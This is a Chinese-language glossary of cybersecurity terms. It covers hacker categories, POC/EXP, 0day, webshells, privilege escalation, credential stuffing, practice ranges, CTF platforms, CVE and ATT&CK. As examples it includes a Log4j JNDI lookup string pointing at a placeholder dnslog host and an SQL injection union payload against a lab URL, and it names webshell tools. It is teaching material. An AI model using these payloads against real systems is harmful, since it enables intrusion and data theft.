网络安全常用术语

黑客（hacker）

• 对计算机技术非常擅长的人，窃取数据、破坏计算机系统
• 匿名的（Anonymous）

脚本小子

刚刚入门安全行业，学习了一些技术，只会只用现成的工具或者从网上复制代码

白帽子

• 白帽子的目的是发现企业的漏洞并且上报给企业，帮助其解决风险问题；
• 360补天、漏洞盒子、CNVD、CNNVD

红帽黑客

• 有正义感、爱国的黑客；
• 利用技术维护国家网络 安全，并且对外来的攻击进行反击。

漏洞（Vulnerability）

• 漏洞指的是硬件、软件、协议等等存在的安全缺陷；
• http://www.cnnvd.org.cn/web/wz/bzxqById.tag?id=3&mkid=3

POC（Proof of Concept）

• 能证明漏洞存在的代码；
• 例:${jndi:ldap://xxxxxx.dnslog.cn/test}。

EXP

• Exploit（利用）；
• 执行了这一段利用代码之后，就能够达到攻击的目的；
• msf。

payload

• 攻击载荷；
• SQL注入：http://localhost/sqli-labs/Less-3/?id=-1‘) union select 1,2,database() –+
• XSS：
• log4j：${jndi:ldap://xxxxxx.domain.cn/test}

0day漏洞

使用量非常大的通用产品漏洞已经被发现了（还没有公开），官方还没有发布补丁或者修复方法的漏洞

1day漏洞

POC和EXP已经被公开了，但是很多人还来不及修复的漏洞

Nday漏洞

漏洞扫描（漏扫）

基于数据库对漏洞进行自动化扫描

补丁

• patch
• 漏洞的修复程序

渗透

• penetration
• 黑客入侵网站或者计算机系统获取到控制计算机权限的过程

渗透测试

• penetration test
• 用黑客入侵的方式对系统进行安全测试，目的是找出和修复安全漏洞
• 这个过程中不会影响系统的正常运行，也不会破坏数据

木马

• Trojan horse
• 隐藏在计算机中的恶意程序

病毒

• Virus
• 恶意代码或程序

杀毒软件

• 360
• 瑞星
• 江民
• 金山
• 诺顿
• 卡巴斯基
• McAfee

免杀

绕过杀毒软件

肉鸡

• 已经被黑客获得控制权限的机器，可能是个人电脑也可能是企业或者政府单位的服务器
• 通常情况下因为使用者并不知道已经被入侵，所以黑客可以长期获得权限和控制。

抓鸡

利用出现概率非常高漏洞(比如log4j、永恒之蓝)，使用自动化方式获取肉鸡的行为

跳板机

黑客为了防止被追溯和识别身份，一般都不会用自己的电脑发起攻击，而是利用获取的肉鸡来攻击其他目标，这个肉鸡就充当一个跳板的角色

DDos

• Distributed Denial of Service
• 分布式拒绝服务攻击
• 发起大量恶意请求，导致正常用户无法访问

后门

• backdoor
• 黑客为了对主机进行长期的控制，在机器上种植的一段程序或留下的一个“入口”

中间人攻击

• Man-in-the-Middle Attack
• MITM攻击
• 运行中间服务器，拦截并篡改数据

网络钓鱼

钓鱼网站指的是冒充的网站，用来窃取用户的账号密码

webshell

• shell是一种命令执行工具，可以对计算机进行控制
• webshell就是asp、php、jsp之外的web代码文件，通过这些代码文件可以执行任意的命令，对计算机做任意的操作

分类：

• 小马
• 一句话木马：godzilla、behinder、ant sword
• 大马

GetShell

获得命令执行环境的操作

例如：

• Redis的持久化功能
• MySQL的写文件功能
• MySQL的日志记录功能
• 上传功能
• 数据备份功能
• 编辑器

提权

• Privilege Escalation
• 权限提升
• 利用普通用户把自己提升为管理员的操作

拿站

指得到一个网站的最高权限，即得到后台和管理员名字和密码

脱（拖）裤

拖库指的是网站被入侵以后，黑客把全部的数据都导出，窃取到了数据文件

装库

用获得的裤子去批量登录其他的网站

旁站入侵

入侵同服务器的其他网站

横向移动

攻击者入侵一台服务器成功以后，基于内部网络，继续入侵同网段的其他机器

代理

• Proxy
• 帮助发起网络请求的一台服务器

VPN

• Virtual Private Network
• 代理
• 加密通信
• 远程办公（从家里连接到公司内网）

蜜罐

• HoneyPot
• 吸引攻击者攻击的伪装系统，用来实现溯源和反制

沙箱

• Sandbox
• 沙箱是一种按照安全策略限制程序行为的执行环境，就算有恶意代码，也只能影响沙箱环境而不会影响到操作系统。

靶场

模拟的有漏洞的环境
可以是网站、容器、操作系统

类型：

web综合靶场：DVWA、pikachu、bwapp
web专用靶场：sqli-labs、upload-labs、xss-labs
漏洞复现靶场：CVE-44228
操作系统靶场：vulnhub
CTF靶场：专门用来练习CTF题目，每个人都有一个独立的环境

堡垒机

jumpserver跳板机
运维审计系统：管理资源，审批，审计，访问控制，事件记录

WAF

Web Application Firewall
Web应用防火墙
对HTTP/HTTPS的流量内容进行分析，拦截恶意攻击行为

APT

Advanced Persistent Threat
高级可持续威胁攻击
指有组织在网络上对特定对象展开的持续有效的攻击活动
报告：2021深信服APT攻防趋势半年洞察

护网（HVV）

国家组织牵头组织事业单位，国企单位，名企单位等开展攻防两方的网络安全演习

CTF

Capture The Flag夺旗赛：起源于1996年DEFCON全球黑客大会；解出题目，获得flag，就可以得分

是一种黑客技术竞赛：

解题形式：Jeopardy
攻防形式：Attack-Defense

方向：

Reverse
Pwn
Web
Crypto
Misc
Mobile

常用在线CTF：

bugku：https://ctf.bugku.com/challenges/index.html
北京联合大学：https://ctf.bugku.com/challenges
CTFHub：https://www.ctfhub.com/
bmzCTF：http://bmzclub.cn/challenges
攻防世界：https://adworld.xctf.org.cn
CTFSHOW：https://ctf.show/challenges

CVE

Common Vulnerabilities and Exposures
通用漏洞披露

Mitre

例如：CVE-2021-44228

https://www.cve.org/

CNVD

国家信息安全漏洞共享平台：https://www.cnvd.org.cn/
国家计算机应急响应中心（CNCERT维护）：https://www.cert.orgh.ctmn/lpublish/main/index.html

应急响应

一个公司为了应对各种安全事件所做的准备和事后采取的措施

SRC

Security Response Center：企业的应急响应中心
http://0xsafe.org/

公益SRC

https://www.vulbox.com/
https://src.sjtu.edu.cn/

网络空间测绘

网络空间资源收录

网络空间搜索引擎：

www.shodan.io
fofa.so
www.zoomeye.org

ATT&CK

Adversarial Tactics, Techniques, and Common Knowledge
对抗战术、技术和通用知识（攻击者技战术的知识库）

Mitre

风险分析模型：收集威胁情报，模拟APT攻击

逆向

Reverse

把程序还原为源代码，分析程序的运行过程

DevOps

Development+Operations
开发测试运维一体化

CICD

包括：

持续集成（Continuous Integration）
持续交付（Continuous Delivery）
持续部署（Continuous Deployment）

具体技术：

Git代码管理
Jenkins版本管理
代码扫描
自动化测试

DevSecOps

Development+Security+Operations
安全开发与运维

等保

网络安全等级保护

要求相关行业的单位和公司的信息系统必须进行定级，然后在公安机关备案，然后建设整改，然后由测评机构评级，并且持续维护和监督。